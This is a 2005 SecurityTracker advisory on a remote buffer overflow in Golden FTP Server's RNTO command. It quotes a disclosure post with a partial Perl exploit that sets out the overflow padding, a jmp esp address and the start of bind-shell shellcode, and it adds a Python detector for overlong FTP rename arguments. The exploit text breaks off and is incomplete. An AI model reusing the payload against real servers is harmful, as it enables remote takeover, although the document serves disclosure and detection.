


Category:   Application (File Transfer/Sharing)  >   Golden FTP Server
Vendors:   KMiNT21 Software
Golden FTP Server Buffer Overflow in RNTO Command Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1012973
SecurityTracker URL:
CVE Reference:   CVE-2005-0566   (Links to External Site)
Updated:  Feb 28 2005
Original Entry Date:  Jan 24 2005
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): prior to 2.05b
Description:   A vulnerability was reported in Golden FTP Server. A remote user can execute arbitrary code.

Barabas reported that a remote user can send a specially crafted RNTO command to execute arbitrary code on the target server.

Impact:   A remote user can execute arbitrary code on the target system with the privileges of the target FTP service.
Solution:   The vendor has released a fixed version (2.05b), available at:

Vendor URL: (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  [Full-Disclosure] several BO's in goldenftpd

For the millions that use this ftp server:

It has numerous cool features, like no authentication whatsoever,
typos in error messages, buffer overflows etc...
I just opened it up when my dog jumped on the keyboard and
accidentally sent a specially crafted packet to localhost and..BAM...a
shell on port 4444.
Luckily I had ethereal running and here it is:
Oh yeah, vendor notified and fixed it (hopefully, didn't check)

#!/usr/bin/perl -w
# Barabas - -
# cheers to muts and all peeps at WH.
# XPSP2 goldenftpserver sploit - bind 4444

use strict;
use Net::FTP;
my $payload="\x41"x260;
$payload .="\x65\x82\xa5\x7c";#jmpesp
$payload .="\x90"x32;#not really necessary...blah
# win32_bind -  EXITFUNC=seh LPORT=4444 Size=321 Encoder=None
$payload .="\xfc\x6a\xeb\x4f\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".

my $ftp = Net::FTP->new("", Debug => 1);
Full-Disclosure - We believe in it.
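
A detection-side check for the condition this advisory describes, added here as an example; it is not part of the SecurityTracker entry or of the source message. It inspects raw FTP control-channel lines and flags RNFR/RNTO commands whose argument is overlong or contains non-printable bytes. The 255-byte limit, the ASCII-only filename policy and the sample traffic are assumptions.

```python
import re

# Assumed policy limit (not from the advisory): Windows MAX_PATH is 260, and the
# posted proof of concept pads with 260 filler bytes before its overwrite begins.
MAX_ARG_LEN = 255
PATH_COMMANDS = {b"RNFR", b"RNTO"}  # rename pair; extend to other path-taking verbs
PRINTABLE = re.compile(rb"[\x20-\x7e]*")  # assumption: filenames are printable ASCII


def inspect_command(line: bytes):
    """Return a list of findings for one raw FTP control-channel line."""
    line = line.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    verb = verb.upper()  # FTP verbs are case-insensitive
    if verb not in PATH_COMMANDS:
        return []
    name = verb.decode("ascii")
    findings = []
    if len(arg) > MAX_ARG_LEN:
        findings.append(f"{name} argument is {len(arg)} bytes (limit {MAX_ARG_LEN})")
    if not PRINTABLE.fullmatch(arg):
        findings.append(f"{name} argument contains non-printable bytes")
    return findings


def scan(lines):
    """Yield (line_number, finding) for every suspicious command in a capture."""
    for number, line in enumerate(lines, 1):
        for finding in inspect_command(line):
            yield number, finding


# Constructed sample control-channel traffic (not taken from a real capture).
SAMPLE = [
    b"USER anonymous\r\n",
    b"RNFR report.txt\r\n",
    b"RNTO report-2005.txt\r\n",
    b"RNTO " + b"A" * 300 + b"\r\n",
    b"rnto short\x90\x90name\r\n",
]

if __name__ == "__main__":
    for number, finding in scan(SAMPLE):
        print(f"line {number}: {finding}")
```

The same two conditions can be enforced inline by an FTP-aware proxy in front of servers that cannot yet be upgraded to 2.05b.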

